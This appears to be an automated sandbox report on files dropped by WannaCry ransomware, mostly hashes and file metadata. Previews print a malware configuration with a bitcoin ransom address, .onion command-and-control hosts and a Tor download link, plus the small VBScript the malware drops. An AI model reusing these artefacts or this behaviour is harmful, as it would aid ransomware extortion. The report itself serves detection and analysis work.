                                Entropy (8bit):5.981438230537172
                                Encrypted:false
                                SSDEEP:6144:Ir2r5rFriGKbgai112Yq/5hcQTcGzAHzSHeqoftOEEdD4B2pihSpKOKm:naiV25uQTcGzAHOEW+Pzm
                                MD5:90F50A285EFA5DD9C7FDDCE786BDEF25
                                SHA1:54213DA21542E11D656BB65DB724105AFE8BE688
                                SHA-256:77A250E81FDAF9A075B1244A9434C30BF449012C9B647B265FA81A7B0DB2513F
                                SHA-512:746422BE51031CFA44DD9A6F3569306C34BBE8ABF9D2BD1DF139D9C938D0CBA095C0E05222FD08C8B6DEAEBEF5D3F87569B08FB3261A2D123D983517FB9F43AE
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):417759
                                Entropy (8bit):5.853358941151938
                                Encrypted:false
                                SSDEEP:6144:g8r2rQrFr0XGXnZ7rvzRsiWqnjmYl5oHIH9A:gtXGJnvmiggA
                                MD5:E5DF3824F2FCAD0C75FD601FCF37EE70
                                SHA1:902418A4C5F3684DBA5E3246DE8C4E21C92D674E
                                SHA-256:5CD126B4F8C77BDF0C5C980761A9C84411586951122131F13B0640DB83F792D8
                                SHA-512:7E70889B46B54175C6BADA7F042F5730CA7E3D156F7B6711FDF453911E4F78D64A2A8769EB8F0E33E826A3B30E623B3CD4DAF899D9D74888BB3051F08CF34461
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):411369
                                Entropy (8bit):5.909395689751269
                                Encrypted:false
                                SSDEEP:3072:oLQzG3CaDYuKCsZW9p2M8suCOSNKOM0LE5BtBsxvQkVgA2+FOYtLEgZEVPSm0aQY:oWHMACLoYaQ2bj+b0pJ
                                MD5:6D6602388AB232CA9E8633462E683739
                                SHA1:41072CC983568D8FEEB3E18C4B74440E9D44019A
                                SHA-256:957D58061A42CA343064EC5FB0397950F52AEDF0594A18867D1339D5FBB12E7E
                                SHA-512:B37BF121EA20FFC16AF040F8797C47FA8588834BC8A8115B45DB23EE5BFBEBCD1E226E9ACAB67B5EE43629A255FEA2CEEE4B3215332DD4127F187EE10244F1C3
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):523262
                                Entropy (8bit):5.7796587531390795
                                Encrypted:false
                                SSDEEP:6144:+ymz8Jq1p95avGpuO+/jUE8ADu2kNBMY8KHNygoB0+6tMqSsVwvN:+ylSZ+/jU7ynIK5Bb6Y
                                MD5:73D4823075762EE2837950726BAA2AF9
                                SHA1:EBCE3532ED94AD1DF43696632AB8CF8DA8B9E221
                                SHA-256:9AECCF88253D4557A90793E22414868053CAAAB325842C0D7ACB0365E88CD53B
                                SHA-512:8F4A65BD35ED69F331769AAF7505F76DD3C64F3FA05CF01D83431EC93A7B1331F3C818AC7008E65B6F1278D7E365ED5940C8C6B8502E77595E112F1FACA558B5
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):92599
                                Entropy (8bit):5.351249974009154
                                Encrypted:false
                                SSDEEP:1536:pEiL38qIuOFcErNX5d0tRCZiBP2DrbjgpfM2ydbv:aiLsqIHFPpdiU2q
                                MD5:78581E243E2B41B17452DA8D0B5B2A48
                                SHA1:EAEFB59C31CF07E60A98AF48C5348759586A61BB
                                SHA-256:F28CAEBE9BC6AA5A72635ACB4F0E24500494E306D8E8B2279E7930981281683F
                                SHA-512:332098113CE3F75CB20DC6E09F0D7BA03F13F5E26512D9F3BEE3042C51FBB01A5E4426C5E9A5308F7F805B084EFC94C28FC9426CE73AB8DFEE16AB39B3EFE02A
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):711459
                                Entropy (8bit):5.884120014912355
                                Encrypted:false
                                SSDEEP:12288:hXhKnXI0Fkw80VEJtzwIA6Ouah6ESyrWlp36Z:thKnnkw80VEJtzwIAiazSxlFw
                                MD5:A12C2040F6FDDD34E7ACB42F18DD6BDC
                                SHA1:D7DB49F1A9870A4F52E1F31812938FDEA89E9444
                                SHA-256:BD70BA598316980833F78B05F7EEAEF3E0F811A7C64196BF80901D155CB647C1
                                SHA-512:FBE0970BCDFAA23AF624DAAD9917A030D8F0B10D38D3E9C7808A9FBC02912EE9DAED293DBDEA87AA90DC74470BC9B89CB6F2FE002393ECDA7B565307FFB7EC00
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):3098624
                                Entropy (8bit):6.512654975680739
                                Encrypted:false
                                SSDEEP:49152:5m9/gUvHrLaQ4Dt4PC+3xhae2cQX7E5zNvQIJZW/1h4+o4:MiuLSDt2C+3baAQX7ETQIr+h4+o
                                MD5:FE7EB54691AD6E6AF77F8A9A0B6DE26D
                                SHA1:53912D33BEC3375153B7E4E68B78D66DAB62671A
                                SHA-256:E48673680746FBE027E8982F62A83C298D6FB46AD9243DE8E79B7E5A24DCD4EB
                                SHA-512:8AC6DC5BB016AFC869FCBB713F6A14D3692E866B94F4F1EE83B09A7506A8CB58768BD47E081CF6E97B2DACF9F9A6A8CA240D7D20D0B67DBD33238CC861DEAE8F
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\@WanaDecryptor@.exe
                                File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                Category:dropped
                                Size (bytes):107520
                                Entropy (8bit):6.440165833134522
                                Encrypted:false
                                SSDEEP:1536:NlN3sTKU7xniaO9ADje81EQ3aL8WNdUCqfRnToIfBoIONIOqbW+xCvETe:DpsmU7xaiDjeJL5qf5TBfgHqbdxCv6e
                                MD5:FB072E9F69AFDB57179F59B512F828A4
                                SHA1:FE71B70173E46EE4E3796DB9139F77DC32D2F846
                                SHA-256:66D653397CBB2DBB397EB8421218E2C126B359A3B0DECC0F31E297DF099E1383
                                SHA-512:9D157FECE0DC18AFE30097D9C4178AE147CC9D465A6F1D35778E1BFF1EFCA4734DD096E95D35FAEA32DA8D8B4560382338BA9C6C40F29047F1CC0954B27C64F8
                                Malicious:true
                                Antivirus:
                                • Antivirus: ReversingLabs, Detection: 0%
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.807981005733831
                                Encrypted:false
                                SSDEEP:24:Mcx5jh68dTprtSkqZOL0BbPa9omSj9uzoDkDT:DTTpxShOLOrmSBuzo4P
                                MD5:77205474DC1784F928EE5888A1F646BD
                                SHA1:E68203E0D04FF8087DA3C50FE58CD85DC6400843
                                SHA-256:C40580AF0358D5A521898B82B70030E53A1FC72F1756ADE1FBBFBA7B6D62CAE4
                                SHA-512:6FC11775F7F4F72D42D60A68D98B61B8F4AF581509421BF7954BFD7F67ADA99E132DFF490F97DEEFB61D044243E8AA38295391857FFF22FDF291DCBE7CF1CF28
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.845056168591268
                                Encrypted:false
                                SSDEEP:24:bkfowZ81WGjUIrn9b9OBJsj2frhPjCD5gHAKSjpYEn:bkfp+WGjzrn90BC2zo6Gl
                                MD5:D599D9F24C782D7E27E6C8D7377D103E
                                SHA1:CF651104591B9EA7326B5C41DE98CD6C11852860
                                SHA-256:8788C4F33DB9B2BEB5725AE86395B795E03A8ECB4AA450C729351F3FE986C4AD
                                SHA-512:7AFC606D42CDC01A5FBBA042618B7CF12D49BD1B3DE5CB539973D098C12B7A4B314F5FA4128C4610C97F6CE4B1A7D9A34F24C288EE0C23F78A33EF3A8E565D25
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.782388491358477
                                Encrypted:false
                                SSDEEP:24:pQeWISeNeZWSbpbZ79KcYVdIhbDzQGYl7et1KC2qwA6RkE:pwISUewSn79HYVdefcZ1et1hbwAVE
                                MD5:8BF38AFBF8F8E8F7C17A72BF6D60A291
                                SHA1:8BBC577A8989646907DD4D8793F21687D54AAD87
                                SHA-256:6A8F6E4A71FD0855E39AEF798A7F666DB6C6EB2A7A0F3496A126AAEC566BD26E
                                SHA-512:88C3D2338362A9414AB83C82D7D27C765BE3ADB7A98C221EDFCEC1E3EE4BF54F8D2C5F7289F54CA332A2DF6C2599DA5A360528FC57FB81CC8922B99D9D8D4D4F
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.814747537623708
                                Encrypted:false
                                SSDEEP:24:bkqb9rTbw3FNMd5E6ImJ0rPyjFc+HbE8fmBaNT4EUqddFvyYEY0rBFba3oL3YJ1W:bkqxDwXW5Qg0rPam+7HbU2yaD3ocb0j
                                MD5:9DBFE0BE7E872CCA3250C56A92A60C9B
                                SHA1:471CAFB3CD00F2926A720B87CB6209548F85C7C5
                                SHA-256:8E9698D220401AD6A0F862AC15E5CEED325001808B7BA7C57E28EA4D48C4499A
                                SHA-512:08C54E2C63197C4E2B4F849F1B7C5F6B6939AEF20BF60098CDCA9D169494286321E3870AAF6F65C46266762C677DE115F494D1CC5223B76A18C5072ED5A287D1
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.818267296582887
                                Encrypted:false
                                SSDEEP:24:BTmstLBJY0ipGWXYW23pxraT6g6E0wJvq+rBiGmLOXZ:BTL7YdGpWkpu64bg+81IZ
                                MD5:782D4AA1AD11AC86EE6A39F845787541
                                SHA1:CD0637065E7412AB7231805F69244B8DFBC62F18
                                SHA-256:795D3EC64DBD3227ADFC8FE6FF859A4E0DB749EC6F6C5208FC913771B99E4386
                                SHA-512:04726B4FC69B12A19274BEDE741AA47E2519D23EDA5E08FFBA8C0CA3D67C702DBD072A4129BA7B30680868D73EDA391C0ACD3A0335BF0ED460CF132828F642F5
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.827752365705742
                                Encrypted:false
                                SSDEEP:24:bkupo3oS1shD5BkamuyFcjG16bBCmMV1+nsWJ6+Ep1faU8:bkwXwshlV9yaJ01MsWJ2pE
                                MD5:4D6055B129CE2C4542A36F434E6AACB4
                                SHA1:3B0EA6FF93B6182AFE7F276B1FD3AD48CE41D47B
                                SHA-256:4CA734347BD2ACA01B66FDD044BC30A21F0543FD645351E2BB2B31141F809540
                                SHA-512:64A1CD147CF9FD6533D2592F1B28DE0849A283873EC72905CB6AC5669F0EA4DB4A1E9633ABE60D8AB44023E666E03019E06FDF57AA0D0F8544A8B51E0C735369
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:PC bitmap, Windows 3.x format, 800 x 600 x 24, image size 1440000, resolution 3779 x 3779 px/m, cbSize 1440054, bits offset 54
                                Category:dropped
                                Size (bytes):1440054
                                Entropy (8bit):0.3363393123555661
                                Encrypted:false
                                SSDEEP:384:zYzuP4tiuOub2WuzvqOFgjexqO5XgYWTIWv/+:sbL+
                                MD5:C17170262312F3BE7027BC2CA825BF0C
                                SHA1:F19ECEDA82973239A1FDC5826BCE7691E5DCB4FB
                                SHA-256:D5E0E8694DDC0548D8E6B87C83D50F4AB85C1DEBADB106D6A6A794C3E746F4FA
                                SHA-512:C6160FD03AD659C8DD9CF2A83F9FDCD34F2DB4F8F27F33C5AFD52ACED49DFA9CE4909211C221A0479DBBB6E6C985385557C495FC04D3400FF21A0FBBAE42EE7C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):780
                                Entropy (8bit):2.3820348363719486
                                Encrypted:false
                                SSDEEP:6:cMS+pZkaHqHgVcKKfF9mHRMMPRGS37LlN/sUQqGUSGeTsdEC:cMfmaRVcKKfm2MYS3sUQqGLGeTEV
                                MD5:BCBC2EFD9F0436E42A31E0B45451F8BB
                                SHA1:9789EC66E0ACBE6540ACB082AC79A696BB161817
                                SHA-256:3DBCCE0A42F96A87F3778E7CD13BA7195D42CD108DFA080F1C6332443582885E
                                SHA-512:05D49959F048BC523010DBC3A9900BBFCD802BF561DA4D64379996FE1E1ABC3B0D942531095AB041FD940C4D93F8F4BEF7D9AEFAE89DA897551CCB1D965A348A
                                Malicious:false
                                Reputation:unknown
                                Preview:.............................................................................................................>.c...........C......................................................115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):245
                                Entropy (8bit):5.102105952359427
                                Encrypted:false
                                SSDEEP:6:osEARm5ODN23k6dUVwdQELebJIOSmH4ASwAr8uRbJIOYHAyn:oRjDUBVwLCbJIOVtyguRbJIOYH9
                                MD5:020F549D79A7E06A5C2E2185781816AD
                                SHA1:B1F4A201B3575B0A8806BC8714E475120288DC9B
                                SHA-256:4E29190A26D9ABE6B1FBB4F43248E2449579330F2ACBFA6AA808B24EC30BA476
                                SHA-512:26FCE97F6F0E2A63D84F9275DE8A128448C09D9119730DFF9278DBC8D2ED85ABEA66C0D685F048225CF1FBD6B1A87593E3A2F0D4E1E7E4B788095672941BA446
                                Malicious:false
                                Reputation:unknown
                                Preview:C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_27[1].txt.WNCRY..
                                Process:C:\Windows\SysWOW64\cmd.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):199
                                Entropy (8bit):4.993433402537439
                                Encrypted:false
                                SSDEEP:3:gponhvDCKFcsDONy+WlynJ96JS2x9rbPONy+WlynJSK2Fvn:e+hvbnRoJgJSoPnRoJSK2Fv
                                MD5:BC117AC292350CB5C49A0D1660AFF679
                                SHA1:FB6A629B267BBF4E7E4BC63B299F92DC1E518D4D
                                SHA-256:E7325F2A555AE1A1694951B7782C4159013597C2D5BF480CC091C6A0E66BFC64
                                SHA-512:B66227CF3944AF105818176FA43F628F89E4393B372949BC86A7513E11B62209B96B169C33E836E32C8BBA4387B78844A9FB08F37F62EC1E05DEF2F2BF89B093
                                Malicious:true
                                Reputation:unknown
                                Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):47879
                                Entropy (8bit):4.950611667526586
                                Encrypted:false
                                SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                MD5:95673B0F968C0F55B32204361940D184
                                SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):54359
                                Entropy (8bit):5.015093444540877
                                Encrypted:false
                                SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                MD5:0252D45CA21C8E43C9742285C48E91AD
                                SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):79346
                                Entropy (8bit):4.901891087442577
                                Encrypted:false
                                SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                MD5:2EFC3690D67CD073A9406A25005F7CEA
                                SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):39070
                                Entropy (8bit):5.03796878472628
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                MD5:17194003FA70CE477326CE2F6DEEB270
                                SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):40512
                                Entropy (8bit):5.035949134693175
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37045
                                Entropy (8bit):5.028683023706024
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36987
                                Entropy (8bit):5.036160205965849
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                MD5:7A8D499407C6A647C03C4471A67EAAD7
                                SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36973
                                Entropy (8bit):5.040611616416892
                                Encrypted:false
                                SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37580
                                Entropy (8bit):5.0458193216786
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38377
                                Entropy (8bit):5.030938473355282
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):38437
                                Entropy (8bit):5.031126676607223
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                MD5:4E57113A6BF6B88FDD32782A4A381274
                                SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37181
                                Entropy (8bit):5.039739267952546
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                MD5:3D59BBB5553FE03A89F817819540F469
                                SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):49044
                                Entropy (8bit):4.910095634621579
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                MD5:FB4E8718FEA95BB7479727FDE80CB424
                                SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):37196
                                Entropy (8bit):5.039268541932758
                                Encrypted:false
                                SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
                                MD5:3788F91C694DFC48E12417CE93356B0F
                                SHA1:EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
                                SHA-256:23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
                                SHA-512:B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):36883
                                Entropy (8bit):5.028048191734335
                                Encrypted:false
                                SSDEEP:384:SheftipUENLFsPzy3EFHjHdR2AG2c/EnByeo75Y3kmA31dv61Qy9:Shef3jHdJG2cQZrS14R
                                MD5:30A200F78498990095B36F574B6E8690
                                SHA1:C4B1B3C087BD12B063E98BCA464CD05F3F7B7882
                                SHA-256:49F2C739E7D9745C0834DC817A71BF6676CCC24A4C28DCDDF8844093AAB3DF07
                                SHA-512:C0DA2AAE82C397F6943A0A7B838F60EEEF8F57192C5F498F2ECF05DB824CFEB6D6CA830BF3715DA7EE400AA8362BD64DC835298F3F0085AE7A744E6E6C690511
                                Malicious:false
                                Reputation:unknown
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                Category:dropped
                                Size (bytes):81844
                                Entropy (8bit):4.85025787009624
                                Encrypted:false
